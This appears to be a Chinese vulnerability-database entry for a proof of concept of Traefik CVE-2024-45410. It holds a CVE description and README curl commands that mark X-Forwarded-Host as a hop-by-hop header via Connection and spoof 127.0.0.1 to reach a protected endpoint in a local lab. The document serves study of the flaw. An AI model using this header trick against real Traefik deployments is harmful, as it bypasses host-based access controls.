关联漏洞
标题:Traefik 安全漏洞 (CVE-2024-45410)Description:Traefik是Traefik开源的一款开源的反向代理与负载均衡工具。 Traefik 2.11.8及之前版本和v3.1.2及之前版本存在安全漏洞,该漏洞源于HTTP/1.1协议下通过HTTP Connection头定义某些特定HTTP头作为跳跃头,导致这些头可以被移除或在某些情况下被篡改。
Description
A proof of concept of traefik CVE to understand the impact
介绍
# Proof of Concept of CVE CVE-2024-45410
Resources: https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv
# How-To
Run `curl -i http://flask.localhost/protected`, you shouldn't be able to query the endpoint.
The allowed host are 127.0.0.1, let's use the following query to make a hop-by-hop header via Connection:
`curl -i http://flask.localhost/protected -H "Connection: X-Forwarded-Host" -H "X_Forwarded_Host: 127.0.0.1"`
You should be able to see the protected endpoint
文件快照
[4.0K] /data/pocs/4b364d2f1501ab13ad76a1f4f05a2e1f7d6407a6
├── [ 703] backend.py
├── [ 645] docker-compose.yml
├── [ 195] Dockerfile.backend
├── [ 503] README.md
└── [ 29] requirements.txt
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。